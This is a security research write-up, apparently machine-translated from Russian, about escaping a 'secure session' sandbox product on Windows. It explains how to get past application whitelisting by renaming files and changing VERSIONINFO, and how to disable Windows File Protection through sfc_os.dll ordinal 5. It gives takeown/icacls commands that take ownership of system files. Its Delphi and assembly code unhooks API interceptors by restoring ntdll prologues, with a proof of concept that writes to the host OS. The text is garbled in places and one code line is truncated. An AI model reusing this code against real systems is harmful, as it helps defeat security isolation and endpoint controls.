<Execute OriginalName="calc.exe" PathName="\calc.exe" AppName="Microsoft Calculator" UIDescription="Microsoft Calculator" id="134"/>
Application Control session examines the application run only on paths, file names, as well as record VersionInfo in the file.
This implies you can import an arbitrary application and run it to bypass the control policy of applications. This is implemented by changing the file name and the field in the resource OriginalFilename VERSIONINFO on any of the white list. Moreover, the user may replace any executable file (eg archiver WinRar) to the host OS without any imports into the secure session and the file will automatically be filled in a secure session (run by the correspondences of extensions, or from the "start" menu).
It is also possible to substitute the system default software from the session "Start" menu (Internet Explorer, Notepad, Calculator, File Protection is off to the host OS, you need administrator rights). The substitution of system files can be implemented after disabling File Protection Windows File Protection with a call to the fifth ordinal of exported file system sfc_os.dll functions (windows xp), sample code:
hInst := LoadLibrary('sfc_os.dll');
proc := GetProcAddress(hInst, ordinal 5);
filename := 'c:\windows\system32\calc.exe';
push -1
push filename
push 0
call proc
Either by modifying the rights to the file (Vista and above):
takeown /f <&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;>
icacls <&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;> /grant %username%:F
icacls <&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;> /grant *S-1-1-0:(F)
It is also well executed Bat-files downloaded from the host computer?s folder called "Downloaded from PC", or any other.
The structure of the boot process and secure session:
During the secure session creates a separate process group. Executable files and libraries are the product of two assemblies 32 and 64-bit. But despite this, the 64-bit systems still run a few 32-bit modules in the X folder: \ Go \ PWC \ WoW64.
The second copy process launches the ISWMGR.exe Explorer explorer.exe processes, which is the parent of all, offered in a secure session of external tools and imported programs.
When starting the imported files in a secure session they run a separate application-boot X: \ PWC \ WOW64 \ ISWLDR.dat. He, in turn, loads the library ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks calling functions for working with files, the registry, the clipboard, cryptography, etc:
HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)
HANDLE (__stdcall *result)(UINT, HANDLE); // eax@1
result = SetClipboardData;
addr_SetClipboardData = SetClipboardData;
return result;
int __cdecl hooks_Clipboard()
int v0; // eax@1
int v1; // eax@3
int v2; // eax@5
int v3; // eax@7
int result; // eax@9
v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);
if ( v0 )
addr_SetClipboardData = v0;
v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);
if ( v1 )
addr_GetClipboardData = v1;
v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);
if ( v2 )
addr_OpenClipboard = v2;
v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);
if ( v3 )
addr_EmptyClipboard = v3;
result = splice_func(addr_CloseClipboard, callback_CloseClipboard);
if ( result )
addr_CloseClipboard = result;
return result;
It is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).
Technique, for example, can allow making changes to files \ Registry of the secure session directly to the host system.
procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;
mov eax, [mapped_dll_base]
mov ecx, [eax+3Ch]
mov edx, [mapped_dll_base]
lea eax, [edx+ecx+18h]
mov [var_10], eax
mov ecx, [var_10]
mov edx, [mapped_dll_base]
add edx, [ecx+60h]
mov [var_4], edx
mov eax, [var_4]
mov ecx, [mapped_dll_base]
add ecx, [eax+1Ch]
mov [var_8], ecx
mov ecx, [var_4]
mov edx, [mapped_dll_base]
add edx, [ecx+20h]
mov [var_20], edx
mov eax, [var_4]
mov ecx, [mapped_dll_base]
add ecx, [eax+24h]
mov [var_2C], ec
push dllname
call LoadLibrary
mov [var_28], eax
cmp [var_28], 0
jne @loc_41D111
jmp @ending
mov [var_24], 0
jmp @loc_41D135
mov eax, [var_24]
add eax, 1
mov [var_24], eax
mov ecx, [var_20]
add ecx, 4
mov [var_20], ecx
mov edx, [var_2C]
add edx, 2
mov [var_2C], edx
mov eax, [var_4]
mov ecx, [var_24]
cmp ecx, [eax+18h]
jnb @ending
mov ecx, [var_24]
mov edx, [var_20]
mov eax, [mapped_dll_base]
add eax, [edx]
mov ecx, [var_24]
mov edx, [var_8]
mov eax, [var_28]
add eax, [edx+ecx*4]
mov [var_3C], eax
mov ecx, [var_24]
mov edx, [var_8]
mov eax, [mapped_dll_base]
add eax, [edx+ecx*4]
mov [Src], eax
push 0Ah
mov ecx, [Src]
push ecx
lea edx, [Dst]
push edx
call memcpy
add esp, 0Ch
lea eax, [old]
push eax
push 0Ah
mov eax, [var_3C]
push eax
call VirtualProtect
push 0Ah
lea ecx, [Dst]
push ecx
mov eax, [var_3C]
push eax
call memcpy
add esp, 0Ch
jmp @loc_41D11A
function UnHook(dllname: string): boolean;
MapOffset: pointer;
dll, filename: string;
MapHandle, FileHandle: THandle;
dll := SystemDir + '\' + dllname;
filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
result := CopyFile(PChar(dll), PChar(filename), false);
if result then
FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
If FileHandle <> INVALID_HANDLE_VALUE then
MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
If MapHandle <> 0 then
MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
If MapOffset <> nil then
resolve_APIs_from_dll_images(MapOffset, dllname);
procedure Write2File(filename, s: string);
f: textfile;
assignfile(f, filename);
writeln(f, s);
Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS');